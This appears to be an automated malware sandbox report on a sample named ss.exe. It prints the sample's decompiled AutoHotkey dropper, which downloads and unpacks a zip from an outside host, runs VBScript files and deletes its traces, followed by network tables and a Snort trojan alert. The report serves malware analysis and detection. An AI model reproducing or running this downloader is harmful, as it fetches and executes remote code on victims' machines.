| Code: | ; <COMPILER: v1.1.23.07> #SingleInstance force #NoTrayIcon Sleep, 22000 FileInstall, D:\start.vbs, C:\ProgramData\start.vbs Sleep, 5000 UrlDownloadToFile, http://runing.clan.su/runings.zip, C:\ProgramData\runings.zip Sleep, 4000 FileDelete, C:\ProgramData\runings.exe Sleep, 3000 ArcPath = C:\ProgramData\runings.zip OutPath = C:\ProgramData\ Shell := ComObjCreate("Shell.Application") Items := Shell.NameSpace(ArcPath).Items Items.Filter(73952, "*") Shell.NameSpace(OutPath).CopyHere(Items, 16) Sleep, 4000 FileDelete, C:\ProgramData\runings.zip Sleep, 5000 Run, C:\ProgramData\start.vbs,, UseErrorLevel Sleep, 70000 FileDelete, C:\ProgramData\runings.exe FileDelete, C:\ProgramData\start.vbs Sleep, 2000 Run, C:\Users\Public\Videos\up.vbs,, UseErrorLevel Sleep, 1000 ExitApp |
Network Behavior |
|---|
Snort IDS Alerts |
|---|
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 04/03/18-13:55:57.375675 | TCP | 2008259 | ET TROJAN Suspicious User-Agent (AutoHotkey) | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
Network Port Distribution |
|---|
TCP Packets |
|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Apr 3, 2018 13:55:57.063105106 CEST | 56975 | 53 | 192.168.1.16 | 8.8.8.8 |
| Apr 3, 2018 13:55:57.265172958 CEST | 53 | 56975 | 8.8.8.8 | 192.168.1.16 |
| Apr 3, 2018 13:55:57.373440027 CEST | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
| Apr 3, 2018 13:55:57.373486042 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:55:57.375061989 CEST | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
| Apr 3, 2018 13:55:57.375674963 CEST | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
| Apr 3, 2018 13:55:57.375695944 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:00.171808958 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:00.171840906 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:00.171880960 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:00.171987057 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:00.172004938 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:00.172058105 CEST | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
| Apr 3, 2018 13:56:00.172102928 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:00.174196005 CEST | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
| Apr 3, 2018 13:56:00.270538092 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:00.270646095 CEST | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
| Apr 3, 2018 13:56:15.160710096 CEST | 80 | 49188 | 195.216.243.130 | 192.168.1.16 |
| Apr 3, 2018 13:56:15.160947084 CEST | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
| Apr 3, 2018 13:57:32.611829996 CEST | 49188 | 80 | 192.168.1.16 | 195.216.243.130 |
UDP Packets |
|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Apr 3, 2018 13:55:57.063105106 CEST | 56975 | 53 | 192.168.1.16 | 8.8.8.8 |
| Apr 3, 2018 13:55:57.265172958 CEST | 53 | 56975 | 8.8.8.8 | 192.168.1.16 |
DNS Queries |
|---|
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Apr 3, 2018 13:55:57.063105106 CEST | 192.168.1.16 | 8.8.8.8 | 0x645a | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
|---|
| Timestamp | Source IP | Dest IP | Trans ID | Replay Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Apr 3, 2018 13:55:57.265172958 CEST | 8.8.8.8 | 192.168.1.16 | 0x645a | No error (0) | 195.216.243.130 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
|---|
|
HTTP Packets |
|---|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.1.16 | 49188 | 195.216.243.130 | 80 | C:\Users\user\Desktop\ss.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| Apr 3, 2018 13:55:57.375674963 CEST | 0 | OUT | |
| Apr 3, 2018 13:56:00.171808958 CEST | 2 | IN |